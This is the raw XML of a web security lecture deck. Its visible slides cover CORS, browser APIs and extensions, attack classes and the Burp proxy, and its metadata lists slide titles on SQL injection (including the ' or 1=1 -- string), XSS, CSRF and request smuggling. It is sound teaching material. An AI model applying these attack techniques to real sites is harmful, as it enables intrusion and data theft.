          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XHR and the Fetch API are forced to follow the same-origin policy (e.g., to avoid cross-site request forgeries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Cross-Origin Resource Sharing (CORS) defines a set of headers that allow a page to perform cross-site requests to specific websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31470916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4533-ED8B-5E9F-1ACB-93F4A9143A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File System Access API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F79023-B74F-73AB-D991-7BEC5D038408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The File System Access API allows a browser to access the local filesystem (e.g., to upload a file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports the display of a file picker widget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires user interaction for selecting the file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40528321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9E49-53F0-28D9-4260-457D3A1128C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Extensions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2C313D5-0AAB-66B0-DBB6-6756AF1788F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Extensions are modules that customize and extend the functionality of web browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Extensions can have substantial access to the content of web pages and the browser (e.g., history)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to resources is managed through permissions stored in the manifest of the extension</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7833369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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Web Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656389" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traditional application attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks against same-origin policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2085411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and Modifying HTTP Traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP traffic can be analyzed in different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sniffers can be used to collect traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Servers can be configured to create extensive logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers can be used to analyze the contents received from a server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side/server-side proxies can be used to analyze the traffic without having to modify the target environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side proxies are especially effective in performing vulnerability analysis of web applications because they allow one to examine and modify each request and reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24926514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Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security tool for the interception, analysis, and modification of web requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free version: No save and restore capability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commercial version adds vulnerability scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implemented in Java, runs on any platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The tool can be extended with custom modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>portswigger.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5675027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4317-03CC-D44C-25BC-B917DEF303C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automating Browser Actions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{869D5E7A-02A0-02B1-6FB3-D6DE2E1ECD7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python Requests (retrieval) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BeautifulSoup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (parsing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>requests_html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Supports JavaScript rendering) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Selenium: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.selenium.dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="949924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6336</TotalTime>
  <Words>15313</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>1697</Paragraphs>
  <Slides>209</Slides>
  <Notes>106</Notes>
  <HiddenSlides>27</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209</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="220" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Hack</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>StarSymbol</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>The World-Wide Web</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Standards and Technologies</vt:lpstr>
      <vt:lpstr>Web Vulnerability Analysis</vt:lpstr>
      <vt:lpstr>Technology Review</vt:lpstr>
      <vt:lpstr>URIs, URLs, URNs</vt:lpstr>
      <vt:lpstr>URI Syntax</vt:lpstr>
      <vt:lpstr>URI Syntax</vt:lpstr>
      <vt:lpstr>HyperText Transfer Protocol</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>Requests</vt:lpstr>
      <vt:lpstr>Methods</vt:lpstr>
      <vt:lpstr>Less-Used Methods</vt:lpstr>
      <vt:lpstr>Less-Used Methods</vt:lpstr>
      <vt:lpstr>Resources</vt:lpstr>
      <vt:lpstr>Request Example</vt:lpstr>
      <vt:lpstr>HTTP 1.1 Host Field</vt:lpstr>
      <vt:lpstr>Replies</vt:lpstr>
      <vt:lpstr>Status Codes</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Reply Example</vt:lpstr>
      <vt:lpstr>Header Fields</vt:lpstr>
      <vt:lpstr>Hypertext Markup Language</vt:lpstr>
      <vt:lpstr>HTML – Overview</vt:lpstr>
      <vt:lpstr>HTML – Tags </vt:lpstr>
      <vt:lpstr>HTML – Tags </vt:lpstr>
      <vt:lpstr>HTML – Tags </vt:lpstr>
      <vt:lpstr>HTML – Hyperlink</vt:lpstr>
      <vt:lpstr>HTML – Basic HTML 5 Page</vt:lpstr>
      <vt:lpstr>HTML – Character References</vt:lpstr>
      <vt:lpstr>HTML – Character References Example</vt:lpstr>
      <vt:lpstr>HTML – Character References Example</vt:lpstr>
      <vt:lpstr>HTML – Character References Example</vt:lpstr>
      <vt:lpstr>HTML – Forms </vt:lpstr>
      <vt:lpstr>HTML – Forms</vt:lpstr>
      <vt:lpstr>HTML – Forms</vt:lpstr>
      <vt:lpstr>application/x-www-form-urlencoded</vt:lpstr>
      <vt:lpstr>application/x-www-form-urlencoded</vt:lpstr>
      <vt:lpstr>application/x-www-form-urlencoded</vt:lpstr>
      <vt:lpstr>The iframe Element</vt:lpstr>
      <vt:lpstr>Maintaining State</vt:lpstr>
      <vt:lpstr>Embedding Information in URLs</vt:lpstr>
      <vt:lpstr>Embedding Information in Forms</vt:lpstr>
      <vt:lpstr>Sessions</vt:lpstr>
      <vt:lpstr>Executing Code on the Server</vt:lpstr>
      <vt:lpstr>The Common Gateway Interface</vt:lpstr>
      <vt:lpstr>CGI Programs</vt:lpstr>
      <vt:lpstr>CGI Variables</vt:lpstr>
      <vt:lpstr>Post-CGI Evolution</vt:lpstr>
      <vt:lpstr>Active Server Pages</vt:lpstr>
      <vt:lpstr>Active Server Pages</vt:lpstr>
      <vt:lpstr>Servlets And JavaServer Pages (J2EE)</vt:lpstr>
      <vt:lpstr>PHP</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Web Application Frameworks</vt:lpstr>
      <vt:lpstr>Web Application Frameworks</vt:lpstr>
      <vt:lpstr>Web Application Frameworks</vt:lpstr>
      <vt:lpstr>RESTful APIs</vt:lpstr>
      <vt:lpstr>Example of Resource</vt:lpstr>
      <vt:lpstr>Identifying Resources</vt:lpstr>
      <vt:lpstr>Methods </vt:lpstr>
      <vt:lpstr>User Agents</vt:lpstr>
      <vt:lpstr>Browsers</vt:lpstr>
      <vt:lpstr>Browser Architecture</vt:lpstr>
      <vt:lpstr>Site Isolation</vt:lpstr>
      <vt:lpstr>Java Applets</vt:lpstr>
      <vt:lpstr>ActiveX Controls</vt:lpstr>
      <vt:lpstr>JavaScript/EcmaScript/TypeScript</vt:lpstr>
      <vt:lpstr>Client-side Scripting</vt:lpstr>
      <vt:lpstr>DOM and BOM</vt:lpstr>
      <vt:lpstr>Main Thread and Web Workers</vt:lpstr>
      <vt:lpstr>JavaScript Sandboxing</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>CSP Examples</vt:lpstr>
      <vt:lpstr>HTML 5 Web Messaging</vt:lpstr>
      <vt:lpstr>WebAssembly</vt:lpstr>
      <vt:lpstr>Client-Side Storage</vt:lpstr>
      <vt:lpstr>HTTP Cookies</vt:lpstr>
      <vt:lpstr>Embedding Information in Cookies</vt:lpstr>
      <vt:lpstr>Cookie Structure</vt:lpstr>
      <vt:lpstr>Web Storage</vt:lpstr>
      <vt:lpstr>IndexedDB</vt:lpstr>
      <vt:lpstr>Origin-Private File System</vt:lpstr>
      <vt:lpstr>AJAX</vt:lpstr>
      <vt:lpstr>XML HTTP Request</vt:lpstr>
      <vt:lpstr>Requesting A Document</vt:lpstr>
      <vt:lpstr>Waiting For The Document</vt:lpstr>
      <vt:lpstr>Modifying A Document</vt:lpstr>
      <vt:lpstr>XMLHttpRequest and Fetch Restrictions</vt:lpstr>
      <vt:lpstr>File System Access API</vt:lpstr>
      <vt:lpstr>Browser Extensions</vt:lpstr>
      <vt:lpstr>Web Attacks</vt:lpstr>
      <vt:lpstr>Monitoring and Modifying HTTP Traffic</vt:lpstr>
      <vt:lpstr>Burp</vt:lpstr>
      <vt:lpstr>Automating Browser Actions</vt:lpstr>
      <vt:lpstr>Which Is The Best Way to Authenticate?</vt:lpstr>
      <vt:lpstr>HTTP Authentication</vt:lpstr>
      <vt:lpstr>HTTP Basic Authentication Scheme</vt:lpstr>
      <vt:lpstr>Form-based Authentication</vt:lpstr>
      <vt:lpstr>Better Authentication</vt:lpstr>
      <vt:lpstr>Authentication Caveats</vt:lpstr>
      <vt:lpstr>More Caveats</vt:lpstr>
      <vt:lpstr>Web Single Sign-On</vt:lpstr>
      <vt:lpstr>OAuth 2.0</vt:lpstr>
      <vt:lpstr>Attacking Authentication</vt:lpstr>
      <vt:lpstr>Eavesdropping Credentials</vt:lpstr>
      <vt:lpstr>Brute-forcing Credentials</vt:lpstr>
      <vt:lpstr>Bypassing Authentication</vt:lpstr>
      <vt:lpstr>Session Fixation</vt:lpstr>
      <vt:lpstr>Session Fixation</vt:lpstr>
      <vt:lpstr>OAuth Attacks </vt:lpstr>
      <vt:lpstr>Credential Reset Procedures</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Authorization Attacks</vt:lpstr>
      <vt:lpstr>Forceful Browsing</vt:lpstr>
      <vt:lpstr>Path Traversal</vt:lpstr>
      <vt:lpstr>Implicit Directory Listing</vt:lpstr>
      <vt:lpstr>Parameter tampering</vt:lpstr>
      <vt:lpstr>PHP’s register_global (deprecated!)</vt:lpstr>
      <vt:lpstr>PHP’s register_global</vt:lpstr>
      <vt:lpstr>Authorization Attacks: Parameters</vt:lpstr>
      <vt:lpstr>Parameter Pollution Example</vt:lpstr>
      <vt:lpstr>Lesson Learned</vt:lpstr>
      <vt:lpstr>Server (Mis)Configuration:  Unexpected Interactions</vt:lpstr>
      <vt:lpstr>Command Injection Attacks</vt:lpstr>
      <vt:lpstr>Command Injection Attacks</vt:lpstr>
      <vt:lpstr>Server-Side Includes</vt:lpstr>
      <vt:lpstr>GuestBook CGI Script</vt:lpstr>
      <vt:lpstr>File Inclusion Attacks</vt:lpstr>
      <vt:lpstr>Command Injection in PHP</vt:lpstr>
      <vt:lpstr>HTML Injection</vt:lpstr>
      <vt:lpstr>Preventing Command Injection</vt:lpstr>
      <vt:lpstr>PHP Sanitization</vt:lpstr>
      <vt:lpstr>PHP Sanitization</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Vulnerable Server (Node.js)</vt:lpstr>
      <vt:lpstr>The ‘ or 1=1 -- Technique</vt:lpstr>
      <vt:lpstr>Injecting SQL Into Different Types of Queries</vt:lpstr>
      <vt:lpstr>Identifying SQL Injection</vt:lpstr>
      <vt:lpstr>The UNION Operator</vt:lpstr>
      <vt:lpstr>Determining Number and Type of  Query Parameters</vt:lpstr>
      <vt:lpstr>Determining Table and Column Names</vt:lpstr>
      <vt:lpstr>Second-Order SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Time-Based Blind SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Solutions</vt:lpstr>
      <vt:lpstr>SQLi Solutions: Stored Procedures</vt:lpstr>
      <vt:lpstr>SQLi Solutions: Stored Procedures</vt:lpstr>
      <vt:lpstr>SQLi Solutions: Prepared Statements</vt:lpstr>
      <vt:lpstr>XPath Injection</vt:lpstr>
      <vt:lpstr>XPath Injection Example</vt:lpstr>
      <vt:lpstr>Accessing User Information</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Reflected Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Stored Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Executing JavaScript</vt:lpstr>
      <vt:lpstr>DOM-Based XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Detecting XSS and SQLi</vt:lpstr>
      <vt:lpstr>Sanitization Can Be Tricky</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>CSRF Countermeasures</vt:lpstr>
      <vt:lpstr>CSRF Countermeasures</vt:lpstr>
      <vt:lpstr>Server-Side Request Forgery</vt:lpstr>
      <vt:lpstr>SSRF</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking Example</vt:lpstr>
      <vt:lpstr>Clickjacking Example</vt:lpstr>
      <vt:lpstr>Frame-Busting Code</vt:lpstr>
      <vt:lpstr>Fear the EAR</vt:lpstr>
      <vt:lpstr>Insecure Error Handling</vt:lpstr>
      <vt:lpstr>HTTP Redirects</vt:lpstr>
      <vt:lpstr>Execution After Redirect: Example</vt:lpstr>
      <vt:lpstr>EAR History</vt:lpstr>
      <vt:lpstr>Types of EARs</vt:lpstr>
      <vt:lpstr>EAR: Information Leakage</vt:lpstr>
      <vt:lpstr>Prevention</vt:lpstr>
      <vt:lpstr>Logic Flaws</vt:lpstr>
      <vt:lpstr>OWASP Top Ten Web Vulnerabilities</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Attacking HTTP Protocol Implementations</vt:lpstr>
      <vt:lpstr>HTTP Response Splitting</vt:lpstr>
      <vt:lpstr>Redirection Example</vt:lpstr>
      <vt:lpstr>Response Splitting</vt:lpstr>
      <vt:lpstr>The Response Output </vt:lpstr>
      <vt:lpstr>HTTP Request Smuggling</vt:lpstr>
      <vt:lpstr>HTTP Request Smuggling</vt:lpstr>
      <vt:lpstr>HTTP Request Smuggling</vt:lpstr>
      <vt:lpstr>HTTP Request Smuggling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Giovanni Vigna</dc:creator>
  <cp:lastModifiedBy>Giovanni Vigna</cp:lastModifiedBy>
  <cp:revision>254</cp:revision>
  <cp:lastPrinted>2018-11-27T16:51:49Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-19T17:06:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-20T18:38:08Z</dcterms:modified>
</cp:coreProperties>
</file>